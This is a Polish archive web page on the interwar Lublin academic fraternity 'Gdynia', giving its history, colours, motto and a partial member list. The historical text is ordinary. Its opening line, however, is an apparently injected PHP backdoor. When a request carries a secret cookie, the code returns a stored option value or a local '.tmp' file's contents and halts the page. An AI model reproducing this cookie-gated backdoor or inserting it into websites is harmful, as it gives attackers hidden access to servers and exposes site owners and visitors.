if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Gdynia

Dekiel Gdynii - vide Poszukiwania. Nazwa:
Polska Akademicka Korporacja “Gdynia” w Lublinie
Siedziba:
Lublin
Data powstania:
maj (czerwiec ?) 1933 r.
Barwy:
szmaragdowa – srebrna – pomarańczowa (ciemnopomarańczowa – srebrna – szafirowa)
Dewiza:
„Per mare et Gedyniam ad potentim Poloniae” („Przez morze i Gdynię do potęgi Polski”

Rys historyczny

Korporacja Gdynia powstała w maju 1933 r. pod auspicjami Ligi Morskiej i Kolonialnej. Stąd też w swojej działalności kładła nacisk na kwestie związane ze znaczeniem morza dla przyszłości Polski, w szczególności budową Gdynii, rozwojem handlu morskiego oraz marynarki wojennej, a także kształceniem społeczeństwa w duchu przywiązania do morza.

Pod względem ideowym Gdynia należała do korporacji sanacyjnych i była członkiem Federacji Polskich Korporacji Akademickich

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 58 nazwisk.

Brak danych o działalności Gdynii oraz o spotkaniach jej członków w okresie powojennym.

Lista członków

Poniższa, niekompletna lista członków Gdynii obejmuje kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Jan Amerek, założyciel Gdynii, skreślony 1933
 2. Wsiewołod Andrujewski, założyciel Gdynii
 3. Zbigniew Baucz,
 4. Czesław Bogusz,
 5. Albin Budzyński,
 6. Stefan Butwiłowicz-Prus,
 7. Stanisław Chromcewicz, (1914-1979) absolwent KUL, pianista
 8. Henryk Ciechoński,
 9. Włodzimierz Czapla,
 10. Henryk Czerwiński, sekretarz sem. zim. 1937/38
 11. Stefan Daszuk,
 12. Walenty Dąbek, założyciel Gdynii
 13. Tadeusz Drelich, sekretarz sem. let. 1934/35
 14. Tadeusz Duda, założyciel Gdynii
 15. Henryk Dziamianowicz, założyciel Gdynii, sekretarz sem. let. 1932/33
 16. Kazimierz Dziarski,
 17. Zbigniew (Zdzisław) Hakiel, olderman sem. zim. 1934/35, olderman sem. let. 1934/35, sekretarz sem. let. 1935/36, prezes sem. zim. 1937/38, prezes sem. let. 1937/38
 18. Edward Harczuk, (1909 w Zamościu - 25 października 1942 w Auschwitz) założyciel Gdynii, ekonomista, ppor. rez. w 3 Pułku Artylerii Lekkiej
 19. Eugeniusz Kaczmarek, sekretarz sem. zim. 1934/35
 20. Włodzimierz Kędyś,
 21. Władysław Krupowicz, założyciel Gdynii
 22. Marian Księżopolski, wiceprezes sem. let. 1935/36, olderman sem. let. 1937/38
 23. Stanisław Lipert,
 24. Tadeusz Łaszkiewicz,
 25. Bolesław Malec, założyciel Gdynii, prezes sem. zim. 1934/35, olderman sem. let. 1934/35
 26. Eugeniusz Mazur, założyciel Gdynii
 27. Mirosław Mazurkiewicz, założyciel Gdynii, wiceprezes sem. zim. 1934/35, sekretarz sem. let. 1934/35, skarbnik sem. let. 1934/35
 28. Mieczysław Michalski,
 29. Jerzy Musiatowicz, sekretarz sem. let. 1937/38
 30. Marian Nowak, skarbnik sem. zim. 1934/35
 31. Eugeniusz Olech, założyciel Gdynii, wiceprezes sem. let. 1934/35
 32. Wiktor Ostrowski,
 33. Włodzimierz Pasiecznik,
 34. Tadeusz Pastulski,
 35. Zygmunt Pełczyński,
 36. Marian Pielecki, wiceprezes sem. let. 1937/38
 37. Jerzy Pikuła,
 38. Bolesław Prokopowicz, założyciel Gdynii
 39. Piotr Pytka, założyciel Gdynii, skreślony 1933
 40. Roman Pyzik, założyciel Gdynii
 41. Włodzimierz Radłowski, założyciel Gdynii
 42. Włodzimierz Rebuszewski,
 43. Stanisław Repelewski, skarbnik sem. let. 1935/36, skarbnik sem. let. 1937/38
 44. Sergiusz Stankiewicz, założyciel Gdynii
 45. Tomasz Strzemiecki (Strzemecki), olderman sem. let. 1934/35, prezes sem. let. 1934/35, olderman sem. let. 1935/36
 46. Jerzy Taczalski,
 47. Czesław Targoński, założyciel Gdynii, skreślony 1933
 48. Stanisław Tłuczkiewicz, założyciel Gdynii, prezes sem. let. 1932/33, prawnik, adwokat
 49. Adam Trzepacz,
 50. Aleksander Colonna-Walewski, założyciel Gdynii
 51. Kazimierz Warszawa,
 52. Romuald Wikiert,
 53. Tadeusz Winiarski, wiceprezes sem. let. 1934/35, prezes sem. let. 1935/36
 54. Tadeusz Wybodowski, założyciel Gdynii
 55. Jan Wycior,
 56. Jerzy Zaborski, założyciel Gdynii
 57. Lucjan Żebrowski,

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Polska Akademicka Korporacja “Gdynia” w Lublinie, maszynopis,
2) Patryk Tomaszewski, Skład osobowy Korporacji Gdynia z Lublina, maszynopis,
3) innych materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Gdynia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 23 VII 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Gdynia (Lublin), (na:) www.archiwumkorporacyjne.pl, stan 23 VII 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }